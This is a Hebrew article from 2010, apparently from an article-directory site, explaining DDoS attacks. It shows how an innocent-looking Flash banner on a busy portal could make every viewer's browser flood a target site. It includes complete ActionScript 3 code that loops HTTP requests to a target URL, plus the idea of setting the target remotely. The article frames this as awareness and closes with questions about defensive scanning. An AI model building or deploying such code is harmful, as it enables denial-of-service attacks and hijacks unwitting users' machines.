דף הבית מחשבים וטכנולוגיה תוכנה התקפת DDoS באמצעות פלאש
התקפת DDoS באמצעות פלאש
אלעד כהן 14/08/10 |  צפיות: 2748

התקפת DDoS (Distributed Denial of Service) הינה התקפה המבוצעת ע"י מספר גדול של גורמים (לדוגמא: מחשבים שונים באינטרנט) על גורם מסויים אחד (לדוגמא: אתר אינטרנט).
מטרת התקיפה היא לגרום להשבתת פעילות הגורם (לדוגמא: מניעה מאתר מסויים לתת שירות לגולשיו), בהמשך אפרט איך ניתן מקובץ פלאש בלתי-מזיק לכאורה ליצור התקפה מאסיבית על אתרי אינטרנט.
התקפות DDoS מבוצעות ע"י ניצול המשאבים של הגורם המותקף כך שמשאביו של הגורם המותקף לא יהיו פנויים עבור משתמשים רגילים, לדוגמא כשהדפדפן מבקש עמוד מסויים מאתר אינטרנט, השרת בו נמצא האתר מעבד את הבקשה ולאחר מכן שולח את העמוד לגולש אשר ביקש אותו. במידה והשרת יקבל כמות פניות אדירה, רכיבי החומרה והתוכנה שבו לא יוכלו לעמוד בעומס ופשוט יקרסו, זוהי תוצאה של התקפת DoS או DDoS, בעל האתר יכול להתקין הגנות בין מי שמנסה להתקיף את האתר לבין השרת בו מותקן האתר, כגון: רכיבי חומרה או תוכנה שיודעים לזהות התקפות, לעמוד בעומס כבד ולסנן את הבקשות הזדוניות לפני שהן מגיעות לאתר.

באפליקציית פלאש (קובץ SWF) אפשר לבצע קריאות לכתובת אינטרנט בפרוטוקול http ע"י שימוש במחלקה URLRequest.
ע"י קריאות חוזרות ונישנות למחלקה זו אפשר לטעון עמודי אינטרנט של אתר מסויים שוב ושוב. פעולה זו ממחשב אחד לא תגרום לקריסת האתר ולא תפגע בביצועיו, אבל מה יקרה אם קוד זה יהיה קיים בתוך באנר פלאש שמוצג בפורטל גדול ?
כל הגולשים שייראו את הבאנר, יהפכו להיות כלים בהתקפת DDoS ללא ידיעתם.

קוד לדוגמא בשפת אקשן-סקריפט 3
package
{
import flash.display.*;
import flash.events.*;
import flash.net.*;

public class DDoS extends MovieClip
{
public var Url:String = "http://www.website.com"; 
public var UrlLoader:URLLoader = new URLLoader();

public function DDoS() 
{
UrlLoader.addEventListener(Event.COMPLETE, Loop);

Loop();
}

private function Loop(e:Event=null):void
{
UrlLoader.load(new URLRequest(Url));
}}}

אם כתובת האתר המותקף (מוגדרת במשתנה Url) תיטען באופן דינאמי מכתובת באינטרנט אז יהיה אפשר לשנות את כתובת האתר המותקף מרחוק ללא שינוי בקובץ ה-SWF.

האם הפורטלים הגדולים בודקים את הקוד של קבצי ה-SWF המוצגים לגולשים ?
האם יש כלי אוטומטי שבודק קבצי SWF ומחפש קוד עויין ? (רעיון לסטארט אפ)


דירוג המאמר:

תגיות של המאמר:

 אלעד כהן

המאמר נכתב ע"י אלעד כהן - מתכנת פלאש בחברת GAME DEV LTD.



 


מאמרים נוספים מאת אלעד כהן
 
ווינר ליין
ווינר ליין הוא אחד ממשחקי הטוטו המופעל על ידי המועצה להסדר הימורים בספורט. משחק ווינר ליין מתקיים באופן שבועי, כאשר בכל שבוע מתפרסמות שלוש רשימות ובהן תשעים...

דורה משחקים לילדים
כיום כבר כולם מכירים את דורה החוקרת שמשחקת עם הילדים ותוך כדי גם מלמדת אותם ומאתגרת אותם במשימות שונות. דורה וחבריה יוצאים להרפתקאות ובדרך נתקלים...

טורניר פוקר - מידע למתחילים
משחק פוקר הוא ביסודו משחק של מספר משתתפים, לרוב בין שניים לשמונה. עידן האינטרנט איפשר גם משחקים יחידים של המתחרה נגד המחשב. ברחבי העולם מתקיימים טורנירי פוקר המאפשרים...

משחק טריוויה
משחק טריוויה הוא אחד מהמשחקים הנפוצים בעולם. מטרתו של משחק טריוויה הוא לבחון את המשתתפים בידע כללי העוסק בתחומים רבים כגון: אישים, פוליטיקה, היסטוריה...

משחקים של דורה
משחקים של דורה הפכו לאחד מסוגי משחקי הילדים האהובים והמבוקשים ביותר בשנה האחרונה. הסיבה העיקרית לכך היא הצלחתה של סדרת הילדים בכיכובה של...

משחקים לילדים בני 6
אחת הדרכים שלנו להעניק ידע לילדנו ולהעשיר את היכרותם עם תחומי ידע שונים, היא לאפשר להם לשחק. כך אנו מבטיחים לעצמנו שאנחנו עושים את השילוב הנכון שבין למידה להנאה, כך שכולם יוצאים מרוצים...

רולטה
Roulette פירושו בצרפתית גלגל קטן. מדובר באחד המשחקים המהנים ביותר בתחום משחקי קזינו. מלבד מכונות מזל, בלאק ג'ק ומשחקי קלפים אחרים, משחק הרולטה הוא משחק של הרבה אדרנלין, סיכון והנאה...

משחקי חשיבה און ליין
כולנו אוהבים אתגרים, כולנו אוהבים לשחק – וכששני אלה משולבים אחד בשני אנחנו יכולים לבלות שעות מול מסכי המחשב. משחקי חשיבה און ליין מאפשרים לנו...

ששבש
בין כל משחקי הלוח הקיימים, ששבש הוא ללא ספק אחד הבולטים והותיקים ביותר בעולם. יש הנוהגים לראות את המשחק כמשחק מזל, אך יש בו גם חשיבה אסטרטגית ושקולה...

פוקר ברשת
משחק פוקר ברשת שינה את תפיסת הפוקר בעולם והפך אותו לאחד ממשחקי הקלפים הנפוצים והאהובים ביותר. כיום, לא רק שחקנים ותיקים מופיעים בשולחנות הפוקר, אלא כל שחקן...
     
 
שיווק באינטרנט על ידי WSI